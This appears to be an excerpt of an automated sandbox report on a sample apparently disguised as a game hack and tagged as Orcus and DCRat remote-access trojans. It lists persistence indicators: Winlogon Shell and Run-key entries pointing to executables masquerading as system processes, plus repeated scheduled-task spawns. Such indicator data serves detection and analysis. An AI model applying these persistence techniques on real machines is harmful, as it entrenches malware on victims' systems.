| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\", \"C:\\Windows\\security\\templates\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\dwm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
Orcus
Orcus family
Orcus main payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\containerRuntime = "\"C:\\Users\\Public\\Documents\\containerRuntime.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\containerRuntime = "\"C:\\Users\\Public\\Documents\\containerRuntime.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\Offline Web Pages\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\Default\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\Default\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Windows\\de-DE\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Java\\jre7\\lib\\dwm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\security\\templates\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\Favorites\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\Favorites\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Users\\Default User\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\Offline Web Pages\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Program Files\\Uninstall Information\\MSBuild.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Windows\\de-DE\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
